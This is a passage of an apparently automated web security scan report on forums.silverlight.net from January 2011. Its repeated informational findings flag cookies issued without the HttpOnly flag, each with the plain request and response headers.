Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31838
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:17 GMT; expires=Sun, 29-Jan-2012 23:20:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Datagr
...[SNIP]...

17.193. http://forums.silverlight.net/forums/p/217709/518306.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217709/518306.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:33 GMT; expires=Sun, 29-Jan-2012 23:19:33 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217709/518306.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27094
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:33 GMT; expires=Sun, 29-Jan-2012 23:19:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
XAML,
...[SNIP]...

17.194. http://forums.silverlight.net/forums/p/217710/518307.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217710/518307.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217710/518307.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25483
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Questi
...[SNIP]...

17.195. http://forums.silverlight.net/forums/p/217719/518310.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217719/518310.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:10 GMT; expires=Sun, 29-Jan-2012 23:19:10 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217719/518310.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29785
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:10 GMT; expires=Sun, 29-Jan-2012 23:19:10 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Do I r
...[SNIP]...

17.196. http://forums.silverlight.net/forums/p/217724/518300.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217724/518300.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:24 GMT; expires=Sun, 29-Jan-2012 23:20:24 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217724/518300.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25057
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:24 GMT; expires=Sun, 29-Jan-2012 23:20:24 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:24 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
WP7 -
...[SNIP]...

17.197. http://forums.silverlight.net/forums/p/217726/518308.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217726/518308.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217726/518308.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23439
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Callin
...[SNIP]...

17.198. http://forums.silverlight.net/forums/p/217727/518309.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217727/518309.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:17 GMT; expires=Sun, 29-Jan-2012 23:19:17 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217727/518309.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:17 GMT; expires=Sun, 29-Jan-2012 23:19:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Astero
...[SNIP]...

17.199. http://forums.silverlight.net/forums/t/217026.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217026.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:06 GMT; expires=Sun, 29-Jan-2012 23:19:06 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217026.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107388
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:06 GMT; expires=Sun, 29-Jan-2012 23:19:06 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Elemen
...[SNIP]...

17.200. http://forums.silverlight.net/forums/t/217498.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217498.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:53 GMT; expires=Sun, 29-Jan-2012 23:18:53 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217498.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58442
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:53 GMT; expires=Sun, 29-Jan-2012 23:18:53 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:53 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
MVVM a
...[SNIP]...

17.201. http://forums.silverlight.net/forums/t/217562.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217562.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:54 GMT; expires=Sun, 29-Jan-2012 23:18:54 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217562.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31566
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:54 GMT; expires=Sun, 29-Jan-2012 23:18:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:56 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Self-R
...[SNIP]...

17.202. http://forums.silverlight.net/forums/t/217667.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217667.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217667.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31813
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Datagr
...[SNIP]...

17.203. http://forums.silverlight.net/forums/t/217709.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217709.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217709.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27069
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
XAML,
...[SNIP]...

17.204. http://forums.silverlight.net/forums/t/217710.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/t/217710.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217710.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
